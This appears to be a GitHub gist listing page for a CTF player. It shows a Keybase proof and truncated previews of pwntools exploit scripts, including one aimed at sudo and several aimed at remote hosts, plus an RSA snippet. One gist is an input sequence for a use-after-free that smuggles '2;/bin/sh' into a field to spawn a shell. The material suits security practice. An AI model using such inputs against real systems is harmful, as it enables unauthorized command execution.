I hereby claim:
- I am iamalsaher on github.
- I am iamalsaher (https://keybase.io/iamalsaher) on keybase.
- I have a public key ASC2ainpBPngd1KAmYAXbYSD8JF_ZNVOY0Kx2kcMfrEIbAo
To claim this, I am signing this object:
package main | |
import ( | |
//This is a modified version of natefinch's npipe where I exposed the handle in PipeConn struct so that I can use it as needed | |
"sepipe/npipe" | |
"bytes" | |
"fmt" | |
"io" | |
"os" | |
"sync" |
package manager | |
import ( | |
"bytes" | |
"errors" | |
"io" | |
"os/exec" | |
"sync" | |
"time" | |
) |
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
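# Absolute path of the sudo binary with symlinks resolved.
# NOTE(review): presumably the program this script is run against; the code
# that consumes TARGET is not visible in this excerpt.
TARGET = os.path.realpath("/usr/bin/sudo")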
def setFlags(flags): | |
tgetpassFlags = { | |
"TGP_NOECHO":0x00, |
from Crypto.Util.number import * | |
from gmpy2 import * | |
from Crypto.PublicKey.RSA import importKey | |
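# Load the RSA public key. The context manager closes the file handle
# deterministically instead of leaving it to the garbage collector.
with open("PublicKey.pem") as pem_file:
    key = importKey(pem_file.read())

# Public modulus and public exponent, printed for inspection.
print(key.n)
print(key.e)

# Convert a hard-coded integer to its big-endian byte string and print it.
# NOTE(review): how this integer was obtained is not shown in this file.
# The parenthesised call form parses under both Python 2 and Python 3
# (Python 3 prints the bytes repr).
print(long_to_bytes(195859165006622592278228905243976739313345311002376698392014723869927931336851714245606129350201186625593292413))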
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
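# Hard-coded network endpoint (IPv4 address and TCP port).
# NOTE(review): presumably the remote service the script connects to; the
# connecting code is outside this excerpt.
HOST = "52.9.166.247"
PORT = 1337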
def exploit(r): |
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
HOST="13.56.97.226" | |
PORT=1337 | |
TARGET=os.path.realpath("manipulate") | |
LIBRARY="" |
#!/usr/bin/env python2 | |
import sys,os | |
from pwn import * | |
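# Hard-coded network endpoint (IPv4 address and TCP port).
# NOTE(review): presumably the remote service the script connects to; the
# connecting code is outside this excerpt.
HOST = "13.57.200.124"
PORT = 1337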
def exploit(r): |
2 #set the month | |
12 #set month as december | |
1 #set year | |
2 #set year as 2, allocate a chunk | |
5 #free the chunk, this will free the year chunk to be used anywhere | |
4 #set an admin, this will allocate the year chunk for itself, and we can put arbitrary data for year chunk | |
2;/bin/sh #set this as an admin, this will get stored in the original year chunk, effectively being reused after being called | |
3 #show calender and exec system (cal 12 2;/bin/sh) effectively popping shell |
#!/usr/bin/python2 | |
from pwn import * | |
import sys | |
LOCAL = True | |
HOST = "13.233.178.121" | |
PORT = 1337 | |
BINARY = "./rop" |
I hereby claim:
To claim this, I am signing this object: